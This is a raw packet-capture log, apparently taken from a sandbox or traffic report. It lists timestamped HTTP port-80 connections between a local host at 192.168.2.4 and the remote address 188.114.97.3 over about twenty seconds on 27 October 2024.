                                                                                                                  Oct 27, 2024 19:23:49.627121925 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.631952047 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.632015944 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.632921934 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.632987022 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.633213043 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.638861895 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.986319065 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.991679907 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.245431900 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.289803028 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.322506905 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.327900887 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.330881119 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.331048012 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.336453915 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.445421934 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.492924929 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.601457119 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.608239889 CET8050080188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.608299971 CET5008080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.608757019 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.614202023 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.614290953 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.614419937 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.619937897 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.680624962 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.686069012 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.686352015 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.928251028 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.961886883 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.967549086 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.977411032 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:51.123960018 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:51.164817095 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:51.242623091 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:51.289815903 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:51.434400082 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:51.492975950 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.405580997 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.405746937 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.407058954 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.411837101 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.411859989 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.411914110 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.411928892 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.412444115 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.412503958 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.415956974 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.421277046 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.774441004 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.780040026 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:53.023951054 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:53.180478096 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.228291988 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:53.289875984 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.347937107 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.348463058 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.353873014 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:53.353924036 CET8050091188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:53.354047060 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.354088068 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.354190111 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.359445095 CET8050091188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:53.711872101 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:53.717381001 CET8050091188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:53.977998018 CET8050091188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:54.039846897 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.267026901 CET8050091188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:54.336711884 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.425743103 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.427997112 CET5009280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.431504965 CET8050091188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:54.431567907 CET5009180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.433301926 CET8050092188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:54.433381081 CET5009280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.433525085 CET5009280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.438807011 CET8050092188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:54.853442907 CET5009280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:54.858838081 CET8050092188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:55.243628025 CET8050092188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:55.243840933 CET8050092188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:55.243999958 CET5009280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:55.386358976 CET5009280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:55.387365103 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:55.472417116 CET8050093188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:55.472512960 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:55.472743034 CET8050092188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:55.472805977 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:55.472866058 CET5009280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:55.478077888 CET8050093188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:55.821430922 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:55.833250046 CET8050093188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.062069893 CET8050093188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.149204969 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.165699959 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.171304941 CET8050094188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.171385050 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.171577930 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.176878929 CET8050094188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.272614956 CET8050093188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.336781025 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.412662983 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.413269997 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.418334961 CET8050093188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.418420076 CET5009380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.418649912 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.418819904 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.421049118 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.426589012 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.526910067 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.532609940 CET8050094188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.532622099 CET8050094188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.774324894 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.779748917 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.784327984 CET8050094188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:56.946126938 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:56.992614031 CET8050094188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.016601086 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.071079969 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.149293900 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.338340998 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.383690119 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.462542057 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.462553024 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.463550091 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.468358040 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.468535900 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.468995094 CET8050094188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.469012976 CET8050096188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.469152927 CET5009480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.469162941 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.469248056 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.694938898 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.695023060 CET5009580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.695303917 CET8050096188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.700583935 CET8050095188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:57.825076103 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:57.830634117 CET8050096188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:58.295233011 CET8050096188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:58.336694956 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:58.502199888 CET8050096188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:58.555455923 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:58.637845993 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:58.639863968 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:58.643935919 CET8050096188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:58.644012928 CET5009680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:58.645433903 CET8050097188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:58.645845890 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:58.648310900 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:58.654160976 CET8050097188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:58.998785019 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:59.004792929 CET8050097188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:59.262715101 CET8050097188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:59.336785078 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:59.456310987 CET8050097188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:59.649287939 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:00.699990988 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:00.700875998 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:00.706681967 CET8050097188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:00.706753969 CET8050098188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:00.706846952 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:00.706952095 CET5009780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:00.707062006 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:00.712826967 CET8050098188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:01.055872917 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.061714888 CET8050098188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:01.318418980 CET8050098188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:01.446090937 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.514388084 CET8050098188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:01.514415979 CET8050098188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:01.514481068 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.641020060 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.641819000 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.647110939 CET8050098188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:01.647213936 CET8050099188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:01.647347927 CET5009880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.647391081 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.647578955 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:01.653588057 CET8050099188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.007833004 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.010021925 CET5010080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.013720036 CET8050099188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.015495062 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.015676975 CET5010080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.015734911 CET5010080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.021290064 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.248322010 CET8050099188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.289848089 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.431111097 CET5010080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.436894894 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.436923981 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.444952011 CET8050099188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.493129969 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.610447884 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.826740026 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:02.826867104 CET5010080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:02.919061899 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.067033052 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.071281910 CET5010080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.072998047 CET8050099188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.073096037 CET5009980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.077433109 CET8050100188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.077508926 CET5010080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.108719110 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.114516973 CET8050101188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.114609003 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.114780903 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.120439053 CET8050101188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.462227106 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.468029022 CET8050101188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.709556103 CET8050101188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.789958000 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:03.913897038 CET8050101188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:03.993222952 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.044003010 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.044794083 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.050968885 CET8050101188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:04.051062107 CET8050102188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:04.051218033 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.051215887 CET5010180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.051330090 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.056835890 CET8050102188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:04.400684118 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.406538010 CET8050102188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:04.655396938 CET8050102188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:04.789971113 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:04.854984999 CET8050102188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:04.992989063 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.469165087 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.476520061 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.476795912 CET8050102188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:07.476882935 CET5010280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.482172966 CET8050103188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:07.482249022 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.482633114 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.487993002 CET8050103188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:07.871526957 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.877520084 CET8050103188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:07.932272911 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.938463926 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:07.938545942 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.938731909 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:07.944323063 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.085985899 CET8050103188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.242944002 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.290272951 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.295903921 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.295950890 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.298078060 CET8050103188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.352325916 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.410398960 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.410854101 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.416374922 CET8050103188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.416420937 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.416435003 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.416491985 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.416589975 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.421890974 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.543351889 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.680459023 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.735501051 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.774347067 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.780071020 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.789850950 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.005068064 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.149350882 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.198709011 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.344537973 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.344569921 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.345007896 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.350459099 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.350594997 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.350645065 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.350682020 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.350784063 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.351161003 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.351320028 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.356197119 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.696307898 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.702411890 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.949908018 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.039833069 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.166029930 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.283138037 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.283586025 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.288964033 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.289048910 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.289078951 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.289148092 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.289185047 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.294540882 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.633781910 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.639461040 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.885483980 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.930469990 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.088818073 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.133613110 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.211448908 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.212333918 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.218323946 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.218414068 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.218549967 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.223979950 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.232589960 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.232650995 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.571166992 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.576689959 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.823554993 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.946233034 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.024328947 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.149251938 CET5010880192.168.2.4188.114.97.3
